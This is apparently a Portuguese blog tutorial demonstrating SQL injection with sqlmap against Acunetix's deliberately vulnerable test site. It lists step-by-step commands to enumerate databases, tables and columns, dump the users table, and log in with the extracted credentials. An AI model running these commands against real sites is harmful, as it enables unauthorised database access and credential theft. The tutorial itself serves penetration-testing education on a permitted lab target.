INVASÃO A SITES - SQLMAP - BÁSICO

E ae galera, hoje vamos fazer uma invasão a um banco de dados de um site.

Apresentação - SQLMAP
Sqlmap é uma ferramenta open source para teste de penetração que automatiza o processo de detecção e exploração de vulnerabilidades a Injeção de SQL.

Instalação

sudo apt install sqlmap
ou visite: sqlmap.org

Após a instalação
Nesse tutorial irei demonstrar o uso da ferramenta em um site chamado Home of Acunetix Art (testphp.vulnweb.com) onde os desenvolvedores do ambiente permitem esses tipos de testes de invasão.

Executando o sqlmap:

sqlmap -u http://testphp.vulnweb.com/search.php?test=query –dbs

 Usando o método GET, passamos os seguintes paramentos:

-u: URL DO SITE 

--dbs: LISTA OS BANCO DE DADOS DO SITE

 

Durante o processo de execução o SQLMAP já detecta que o banco de dados do site é MySQL e você pode ser questionado se deseja pular a verificação para outros tipos de banco de dados ou se você que fazer um teste mais profundo sobre o banco de dados detectado, neste caso responda Y (Yes/Sim).

Neste momento o SQLMAP já detectou que o parâmetro cat está vulnerável e você é questionado se deseja realizar outros testes, no momento selecione N (Not/Não).

Como pode visualizar os banco de dados são exibidos: 

[*] acuart

[*] information_schema 

Agora que foram listados os banco de dados vamos extrair as tabelas do banco de dados acuart.

sqlmap -u http://testphp.vulnweb.com/search.php?test=query -D acuart --tables

Parâmetros:

-D: Define o banco de dados que será avaliado.
acuart: Banco de dados do site.
–-tables: Lista todas as tabelas do banco de dados informado.

Como resultado são extraídas 8 tabelas do banco de dados acuart. 

 

+ artists

+ carts

+ categ

+ featured

+ guestbook

+ pictures

+ products

+ users

 

 

Vamos extrair todas as colunas existentes na tabela users.

 sqlmap -u http://testphp.vulnweb.com/search.php?test=query -D acuart -T users --columns

Parâmetros:

-T: Define a tabela que será avaliada.
users: Tabela do banco de dados acuart.
–-columns: Lista todas as colunas da tabela users.

Como resultado são extraídas 8 colunas da tabela users.

+ address

+ cart

+ cc

+ email

+ name

+ pass

+ phone

+ uname

Neste passo iremos realizar o DUMP ou seja extrair todas as informações cadastradas nas colunas da tabela users.

sqlmap -u http://testphp.vulnweb.com/search.php?test=query -D acuart -T users -C name,pass,uname,email --dump

Parâmetros: 

-C: Define as colunas que será avaliada.

name,pass,uname,email: Lista das colunas da tabela users.

--dump: Extrai todas as informações contidas nas colunas da tabela informada.

Segue abaixo todos os dados extraídos:

pass: test

name: John Smith (porem bugado)

uname: test

email: email@email.com

  Com as informações extraídas realize o acesso ao sistema:

Site: testphp.vulnweb.com/login.php
Username: test
Password: test

Foi um tutorial básico, Sqlmap é uma ferramenta muito grande, tem varias opções.